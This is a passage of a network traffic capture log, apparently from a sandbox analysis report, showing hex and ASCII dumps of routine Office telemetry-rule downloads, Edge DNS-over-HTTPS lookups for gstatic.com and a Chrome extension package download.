2024-11-11 09:33:22 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:22 GMT Content-Type: text/xml Content-Length: 632 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6E3779E" x-ms-request-id: feb354c0-101e-0079-0dd5-335913000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093322Z-174f7845968glpgnhC1EWR7uec00000004z0000000001x51 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:22 UTC	632	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]\|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.5	49777	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:22 UTC	192	OUT	GET /rules/rule120612v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:22 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:22 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT ETag: "0x8DC582BB10C598B" x-ms-request-id: 55c0910e-d01e-0082-5dd5-33e489000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093322Z-174f78459685m244hC1EWRgp2c00000004n0000000002w4n x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:22 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.2.5	49779	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:22 UTC	192	OUT	GET /rules/rule120614v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:22 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:22 GMT Content-Type: text/xml Content-Length: 467 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6C038BC" x-ms-request-id: 1815df8f-001e-0028-27d5-33c49f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093322Z-174f7845968px8v7hC1EWR08ng000000051g000000002vay x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:22 UTC	467	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49782	172.64.41.3	443	7640	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:22 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-11 09:33:22 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-11 09:33:22 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Mon, 11 Nov 2024 09:33:22 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8e0d47c7a84241cf-EWR alt-svc: h3=":443"; ma=86400
2024-11-11 09:33:22 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 02 00 04 8e fa 50 43 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcomPC)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49783	172.64.41.3	443	7640	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:22 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-11 09:33:22 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-11 09:33:22 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Mon, 11 Nov 2024 09:33:22 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8e0d47c7ad85421c-EWR alt-svc: h3=":443"; ma=86400
2024-11-11 09:33:22 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 27 00 04 8e fb 29 03 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom'))

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49784	172.64.41.3	443	7640	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:22 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-11 09:33:22 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-11 09:33:22 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Mon, 11 Nov 2024 09:33:22 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8e0d47c7bcb92369-EWR alt-svc: h3=":443"; ma=86400
2024-11-11 09:33:22 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 14 00 04 8e fa b0 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49785	142.250.186.161	443	7640	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:22 UTC	594	OUT	GET /crx/blobs/AYA8VyyVmiyWvldTRU0qGaR4RUSL6-YrG6uKRsMPsRWu4uzTWsENQ0Oe4TwjJlNxU5Vx3wW0XCsKQHAJ2XkWCO0eQ7UF3N9B6xg6w6N4ZQ_ezL5_s1EfR63s25vMOuhpdI4AxlKa5cntVqVuAOGwNK_pRVduNn5fPIzZ/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx HTTP/1.1 Host: clients2.googleusercontent.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 09:33:22 UTC	573	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 135771 X-GUploader-UploadID: AHmUCY2257luI9LUvT9Hw1VaYpfWkl5otFTFoJ9XmvQcKrr4XR60EWpqofmtPE9m1BhiHfw1nKbIg2wjSg X-Goog-Hash: crc32c=5YFIVw== Server: UploadServer Date: Sun, 10 Nov 2024 20:33:29 GMT Expires: Mon, 10 Nov 2025 20:33:29 GMT Cache-Control: public, max-age=31536000 Age: 46793 Last-Modified: Tue, 22 Oct 2024 20:33:19 GMT ETag: a1239f8c_b608f476_b1045d58_830b10c8_3ed9cb2d Content-Type: application/x-chrome-extension Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-11-11 09:33:22 UTC	805	IN	Data Raw: 43 72 32 34 03 00 00 00 e2 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08 Data Ascii: Cr240"0H0^1"wgt2JG1)X4=&?[j,Lzjue[IqBa/XPhL2%3_oH)'=e?j3UH\|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
2024-11-11 09:33:22 UTC	1378	IN	Data Raw: aa 54 89 36 c1 f8 f2 5a f7 ba 97 f1 3f fe f5 43 56 d7 f2 f3 3c 8c e7 4b ff e3 ef 3f c6 cf aa aa f3 6b fd 97 a1 fa fc cb e9 ac aa 1f 7f fd 71 3d bf f7 95 fc 59 5e fa b1 ea c7 1f 7f ff d7 8f 21 7f a8 4b 2e f5 e7 ab 47 d8 14 a6 6d 08 6e 1b a9 59 d7 a5 59 ab f2 b1 7f e2 d6 f5 9c 75 d3 57 66 8e a7 d2 54 4f 22 d9 3f a1 dd 8b 8d ce f7 b3 f0 55 2f 52 64 ec 9b cb 59 7f be 8e 1a 6a ee bf ff de a9 ab 48 a3 f3 51 8d bf ec 7b b7 96 fe fb f9 78 de 4f 51 f3 7e 2b 7d bb ff fe 4c d9 39 5f 12 3a 97 2c 45 97 ef ef 0b 13 71 f1 30 26 ce df 1f 49 3b 62 c4 e0 48 bb b1 11 3e ea f2 8e 02 39 b3 7d 09 42 84 80 d8 92 2e 7c e4 41 b8 a9 7c 61 8b 47 e8 1c 82 eb b9 f4 a1 91 6f f7 4f 7b e5 5c 0b 13 d5 85 cf e6 83 09 bb 83 09 54 69 a1 5a 98 fa ba 1b e6 c2 dc 9c 0f db f0 51 98 ce ef f3 fc Data Ascii: T6Z?CV<K?kq=Y^!K.GmnYYuWfTO"?U/RdYjHQ{xOQ~+}L9_:,Eq0&I;bH>9}B.\|A\|aGoO{\TiZQ
2024-11-11 09:33:22 UTC	1378	IN	Data Raw: 88 1b 77 cc 06 18 f9 d1 78 a4 43 22 82 21 af 78 ed e5 3b 17 31 63 f2 12 16 6f 58 13 8a ac 6b 1f 08 96 b6 8e 59 b4 c8 5e 7b ff 95 e3 e3 6c 66 93 48 75 bd 57 d8 44 86 61 51 06 73 e9 21 bf d8 c1 38 0f 10 8e 94 67 c9 ae de 62 0f 6a 0d 08 71 f9 00 01 36 e4 d7 e2 f8 fd 7e ad e7 de 90 39 1c a3 5e 29 61 4c ee 81 a2 7b 44 c7 8e 2a b9 2d 76 d2 4b 76 32 2c a9 88 31 c0 6e d9 6b 8d a6 5a 8f 18 9d a2 60 79 ed cb ff 87 06 97 0d 1e 32 a3 56 32 10 9f b9 a9 d2 c4 8b 46 12 b8 5e dc 88 5e 98 61 86 3b 1d 0a 96 7b 16 9e c8 68 27 de 4a 05 5d 6c ca cd 72 ee c9 b5 fc 47 ed 73 37 d8 17 1e 9a eb 56 7a a1 49 00 ec 50 20 44 6e 0c 07 32 6b 0d f0 31 8f 82 17 33 36 ef 77 16 e0 38 a3 78 57 75 ef f7 45 fe d6 da dc 1b 3c a4 60 9b 5a c3 ab 54 de 7c 84 75 4b 00 a2 d8 aa 43 dd 63 24 a2 05 b3 Data Ascii: wxC"!x;1coXkY^{lfHuWDaQs!8gbjq6~9^)aL{D*-vKv2,1nkZ`y2V2F^^a;{h'J]lrGs7VzIP Dn2k136w8xWuE<`ZT\|uKCc$
2024-11-11 09:33:22 UTC	1378	IN	Data Raw: ec 3c 53 7b bd 2b 0d f6 8f 48 d5 27 4c 9d 21 67 cf 13 d5 fd 28 ef 16 fb ab 5b b1 72 6f 45 f7 8a 4f da b3 e7 94 c8 03 e1 ba 8f ea 98 8d ad 70 5b 75 d3 db 31 31 1e 65 20 3f 73 03 a7 8c c0 5d 02 07 98 cf a2 15 9d ee 3b 96 d8 5b 6e bd d6 e7 1c e9 c6 a6 3c ec 04 df 03 02 d8 07 6a 07 4f 70 bb e6 0d 44 84 8e 31 f6 ed 1b e9 6a c5 3d 68 26 0c d9 55 07 3f b0 8e cd 25 f6 a5 bf 92 bd 1a 68 de 40 51 36 ee b9 e4 ce 81 50 6c c6 16 de 88 4e bc 66 c4 fd 22 da f5 e3 d6 a9 11 77 1e cc c8 00 69 9f 41 62 95 20 df bd 2c b1 bf 6b be 5b ba 52 77 ca c0 9b 04 7c b7 44 3b 68 e6 61 cf 76 78 4c 3a 74 24 9e d6 21 da de bf f7 1b 89 3f 5c 33 4b 7c e7 5f 9b f5 e1 23 f2 f7 8f ff 83 bf 91 02 97 ae 8d 7f 06 9c bd 4c 5d 83 7b e3 6b 6c 38 41 a1 10 8f 67 d6 26 30 9e 29 6c 6d ce c7 a7 68 e7 66 Data Ascii: <S{+H'L!g([roEOp[u11e ?s];[n<jOpD1j=h&U?%h@Q6PlNf"wiAb ,k[Rw\|D;havxL:t$!?\3K\|_#L]{kl8Ag&0)lmhf
2024-11-11 09:33:22 UTC	1378	IN	Data Raw: 73 be d1 73 8f fe f4 bd 21 33 d5 4d 7a 30 92 e6 a0 73 01 69 4f 6c e7 64 e7 06 c4 1f cd ca 43 29 99 d5 a9 e4 d2 27 1d 24 47 c6 70 b9 db 83 b8 ff e3 7b 43 fd 1c bd 60 8e 2a b8 9e 3b 74 be 19 0c 65 10 ff b7 71 9b 03 75 c2 bc 05 66 42 30 d4 bd 44 4c 1f e0 98 f8 e0 5e 51 d6 09 16 ee 62 8a 41 64 da 7a 3d 5a 33 a2 f1 1d 19 2a c9 80 f3 07 8d 29 4d f6 90 9d 6a f4 d8 56 61 85 9f 3a ce 4e 59 a7 6e a9 e5 ea 31 ff db f8 7b 43 fb aa 2b b5 c2 4c a8 10 57 3e 9d 12 73 e0 51 5f ef a3 40 64 48 ab 09 6b 6a 14 35 a1 2f 83 cb 26 d1 e4 cb 9d b8 cb 6e d2 3d 1d 90 fa 7e 9d 1e 6b cc d2 f8 7b 2e c6 37 f3 df 63 e9 ba ef fe 7d de f2 f4 a7 e7 2c 7f fb ee 20 7d 36 a6 a6 6a 7f 3b 2b 59 eb 18 b5 6f b9 8e 0b c1 c7 7b c1 1d 95 99 f6 ad e8 d4 b5 e8 6c ed 3f a7 af c2 af 3f 73 bf 3d ff ef 77 Data Ascii: ss!3Mz0siOldC)'$Gp{C`;tequfB0DL^QbAdz=Z3)MjVa:NYn1{C+LW>sQ_@dHkj5/&n=~k{.7c}, }6j;+Yo{l??s=w
2024-11-11 09:33:22 UTC	1378	IN	Data Raw: 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 73 76 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 50 03 fc 66 0a 00 20 00 00 00 00 00 01 00 18 00 00 08 b1 f4 0b 14 db 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8d 52 3d 6f dc 30 0c dd fb 2b 08 cf 46 70 fd 1c b2 05 08 d0 a1 45 53 a4 59 02 64 61 4e b4 23 48 a6 04 8a 72 72 08 f2 df 4b 9d 7d 08 ce e8 d0 45 03 45 be f7 f8 1e 5f bb bd 10 2a 31 3d 77 97 af dd 44 a5 e0 48 dd 65 f7 e7 c7 d5 ef 2b f8 75 7f 77 d7 bd f5 1d bd e4 88 8c ea 13 a7 61 88 9e c9 f9 82 8f 91 dc f9 d4 75 85 87 ba db d1 17 81 b5 ef 02 6e 26 70 15 66 1f 23 20 cf cb 37 3b 84 ef 29 8d 91 e0 3a 85 3a 11 2b 54 45 06 cf 4a c2 a4 35 e7 90 72 36 84 b1 3f 42 0e df 72 66 Data Ascii: !-_locales/sv/messages.jsonUTPf R=o0+FpESYdaN#HrrK}EE_*1=wDHe+uwaun&pf# 7;)::+TEJ5r6?Brf
2024-11-11 09:33:22 UTC	1378	IN	Data Raw: d6 92 10 e8 84 d6 9a 4c 28 b9 28 68 15 81 3d 3a d0 47 7f 87 f5 aa c5 a0 2c 48 96 b4 9f 93 24 bf 74 ca 3b a4 a0 f9 6a e6 a1 cc 40 81 91 19 30 5d a1 39 7e 39 01 48 39 a0 4f 22 d8 2a e1 e0 08 be e7 cf 6d 6c b8 0b be c9 03 07 28 7d 6a dc e2 3f 42 98 78 2d d6 a1 b1 19 12 f8 68 b4 04 85 9d 97 35 1c 1b 0c 16 5f 55 b4 c5 fe ea 43 28 83 0e 40 08 bf 0d 79 16 7a c3 cf 26 b0 46 00 0e 4b 9e 50 f8 ed 3b 0e 8c 5d 3c 0b 64 ca 72 2e 90 41 1f b1 d4 e7 ed 22 33 dd 46 8d 4d 1a 99 c7 e4 99 3c 21 86 b1 e4 d2 54 27 cf df ef 91 4e 01 0d 30 81 96 55 96 37 4e 3d d0 01 5c b2 ca 55 80 04 ec aa e2 2a 73 90 6b ac 51 58 5b 6a 0a 34 8b b4 b7 4f b0 0d b9 c6 2c a1 85 38 3d c9 71 2f 07 ef 6d df 60 8f b9 82 8c 87 80 43 e8 d4 88 fe 62 9f b4 94 b9 d7 66 ac 7c 82 88 1d 51 d1 f9 61 37 fe 39 d8 Data Ascii: L((h=:G,H$t;j@0]9~9H9O"ml(}j?Bx-h5_UC(@yz&FKP;]<dr.A"3FM<!T'N0U7N=\UskQX[j4O,8=q/m`Cbf\|Qa79
2024-11-11 09:33:22 UTC	1378	IN	Data Raw: ad c4 ca 60 aa 12 70 5b 7b 7a c3 30 ec 7c ed 63 70 f3 2d c2 2b 61 1b 8f d7 00 1b e0 cd 2b ef 78 f7 a3 67 c0 39 32 a9 1f 80 6c 66 17 97 d6 80 80 69 32 ab bf c3 f0 d2 d1 02 c6 d1 d1 ca 7f 28 f3 d3 05 cf d7 e6 67 96 67 73 39 3b dd 9e 5f c5 2e 08 52 5b 60 e6 23 e4 24 80 17 de cf 8c 32 61 22 26 18 40 81 51 37 1a 3d e4 69 36 45 18 6c 38 96 b1 f8 bc 04 25 63 8c 69 6f 0b 8e 93 22 11 da 2b e2 2e dd 3c 66 df 7d 3c c4 05 36 71 e2 c9 b8 a6 7e 66 b3 9b 73 21 3a a7 95 67 38 d4 83 89 c3 d7 91 64 de c5 5b 01 f5 ff a5 13 58 78 d8 a8 54 25 22 24 d8 16 40 cd 81 70 5e c5 3b d8 dd 55 72 b8 9e d6 48 15 06 41 57 68 5b e8 27 30 b1 82 0f e8 09 d8 f8 24 0d ae 73 05 91 20 6f 32 84 0d f0 82 95 ca 25 80 50 f5 46 fa 49 1e 46 5e 38 4e d2 28 ef db ce 9f 18 54 a7 c3 53 4b c7 26 a2 ba e4 Data Ascii: `p[{z0\|cp-+a+xg92lfi2(ggs9;_.R[`#$2a"&@Q7=i6El8%cio"+.<f}<6q~fs!:g8d[XxT%"$@p^;UrHAWh['0$s o2%PFIF^8N(TSK&
2024-11-11 09:33:22 UTC	1378	IN	Data Raw: 58 0d 04 41 31 f1 f1 a8 15 a1 54 1e 5a 8d 72 3d e2 47 40 31 01 b6 e2 e3 20 ba 53 87 b9 64 39 96 a9 1f 50 8d c3 df 89 4f 3c 44 83 14 ce e2 33 f3 a3 46 d1 e2 45 58 a7 2c f7 48 0a 04 81 50 14 d0 11 86 4d 66 e7 ff be d5 aa ce 18 47 ec d9 2c f8 22 13 e5 35 27 b7 b0 97 2a bf 2c 0b d7 07 48 d7 30 c9 86 93 1f b0 17 3e b8 b1 bc a7 01 17 51 9c 66 55 50 9a b0 bb 80 25 f5 6f 33 e1 cf d4 9d 1c 93 ba 54 72 a7 e2 f6 75 97 90 fe 6f d2 46 10 67 11 75 4c 7e d0 94 af e3 4d 5d b4 38 17 ad 83 c4 09 26 df 24 fb 10 6d 5d e5 56 f8 11 0d 2d bb f3 2c 35 9d 43 aa d3 dc cc 21 ae 95 db 49 63 90 e8 bb b5 a2 31 68 28 4f c1 46 84 c4 ae 85 65 77 6e 1d 5c 72 28 c5 cb d9 9f 0c 82 36 6a 85 c3 0c cb 86 67 50 98 fd a8 5e 6f c5 03 8b 54 f3 c2 30 f0 94 72 6d 96 45 e2 75 68 b3 3c 02 83 6b 79 2f Data Ascii: XA1TZr=G@1 